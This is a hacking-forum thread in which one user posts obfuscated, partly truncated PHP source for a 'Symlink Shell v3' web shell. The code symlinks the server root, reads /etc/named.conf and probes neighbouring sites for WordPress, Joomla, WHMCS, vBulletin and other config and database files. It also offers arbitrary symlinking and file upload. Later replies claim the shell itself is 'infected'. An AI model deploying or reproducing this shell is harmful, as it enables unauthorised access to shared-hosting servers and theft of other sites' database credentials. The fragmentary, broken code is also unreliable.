Versus71 Posted November 16, 2013 Share Posted November 16, 2013 (edited) ';@mkdir('sym',0777);$IIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$II1I =@fopen ('sym/.htaccess','w');fwrite($II1I ,$IIl1);@symlink('/','sym/root');$IIlIl = basename('decrypt.php');echo ' Symlink Shell v3 by kurosaki ';echo ' '.$target.' ';echo '[ Upload File][ Domains / Symlink ][ Domains / Script ][ Symlink File ] ';if(isset($_REQUEST['sws'])){switch ($_REQUEST['sws']){case 'sec':$IIllI = @file('/etc/named.conf');if(!$IIllI){die (" can't read /etc/named.conf");}else{echo " Wordpr3ss";}elseif (strpos($wp222,'200') == true){$II1I1I="Wordpres$";}elseif (strpos($mag111,'200') == true){$II1I1I="Magento";}elseif (strpos($whm111,'200') == true and strpos($whm444,'200') == true ){$II1I1I=" WHMCS4";}elseif (strpos($zen111,'200') == true and strpos($zen222,'200') == true ){$II1I1I=" Zen";}elseif (strpos($whm222,'200') == true){$II1I1I =" WHMCS2";}elseif (strpos($whm333,'200') == true){$II1I1I =" WHMCS3";}elseif (strpos($joom111,'200') == true){$II1I1I=" Joomla";}elseif (strpos($db222,'200') == true){$II1I1I=" db.php";}elseif (strpos($cfig222,'200') == true){$II1I1I=" cfg cfg.php";}elseif (strpos($cfig333,'200') == true){$II1I1I=" config";}elseif (strpos($cart222,'200') == true){$II1I1I=" config";}elseif (strpos($cart333,'200') == true){$II1I1I=" config";}elseif (strpos($cart444,'200') == true){$II1I1I=" config";}elseif (strpos($cart555,'200') == true){$II1I1I=" config";}elseif (strpos($cfig444,'200') == true){$II1I1I=" config";}elseif (strpos($cfig555,'200') == true){$II1I1I=" config";}elseif (strpos($cfig666,'200') == true){$II1I1I=" config";}elseif (strpos($cfig777,'200') == true){$II1I1I=" config";}elseif (strpos($cfg222,'200') == true){$II1I1I=" config";}elseif (strpos($cfg333,'200') == true){$II1I1I=" config";}elseif (strpos($cfg444,'200') == true){$II1I1I=" config";}elseif (strpos($cfg555,'200') == true){$II1I1I=" config";}elseif (strpos($cfg666,'200') == true){$II1I1I=" config";}elseif (strpos($cfg777,'200') == true){$II1I1I=" config";}elseif (strpos($cfg888,'200') == true){$II1I1I=" config";}elseif (strpos($db333,'200') == true){$II1I1I=" database.php";}elseif (strpos($db444,'200') == true){$II1I1I=" admin db.php";}elseif (strpos($db555,'200') == true){$II1I1I=" admin database";}elseif (strpos($db666,'200') == true){$II1I1I=" inc database";}elseif (strpos($db777,'200') == true){$II1I1I=" inc db.php";}elseif (strpos($osc111,'200') == true){$II1I1I=" OSC";}elseif (strpos($osc222,'200') == true){$II1I1I=" OSC 2";}elseif (strpos($ocart111,'200') == true){$II1I1I=" OpenCart admin";}elseif (strpos($ocart222,'200') == true){$II1I1I=" OpenCart main";}elseif (strpos($ocart333,'200') == true){$II1I1I=" OpenCart admin2";}elseif (strpos($ocart444,'200') == true){$II1I1I=" OpenCart main2";}elseif (strpos($mybb111,'200') == true){$II1I1I=" mybb 1";}elseif (strpos($mybb222,'200') == true){$II1I1I=" mybb 2";}elseif (strpos($mybb333,'200') == true){$II1I1I=" mybb 3";}elseif (strpos($vb111,'200') == true){$II1I1I=" vBulletin";}elseif (strpos($vb222,'200') == true){$II1I1I=" vBulletin2";}elseif (strpos($vb333,'200') == true){$II1I1I=" vBulletin3";}else{continue;}$II1I1l = $II1I1['name'] ;echo ''.$IIl11[1][0].''.$II1I1I.'';flush();}}}}break;case 'sym':$IIllI = @file('/etc/named.conf');if(!$IIllI){die (" can't read /etc/named.conf");}else{echo " ".$IIl11[1][0].'';}echo " This is the hidden content, please Sign In or Sign Up '.$II1I1['name']."symlink ";flush();}}}}break;case 'file':echo 'The file path to symlink ';$II1lIl = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink){@symlink("$II1lIl","sym/$symfile");echo ''.$symfile.'';}break;default:header("Location: $IIlIl");}}else{echo '';echo '';if( $_POST['_upl'] == 'Upload') {if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo 'Uploaded successful !!';}else {echo 'Not uploaded !!';}}echo 'Coded by kurosaki ';};echo ' Edited November 16, 2013 by Versus71 Link to comment Share on other sites More sharing options...
D4rkn3S Posted November 20, 2013 Share Posted November 20, 2013 Re: Symlink Shell v3 by kurosaki This shell infected,Don't use! Link to comment Share on other sites More sharing options...
sQuo Posted November 24, 2013 Share Posted November 24, 2013 Re: Symlink Shell v3 by kurosaki This shell infected,Don't use! added decoded version & clean Link to comment Share on other sites More sharing options...
Recommended Posts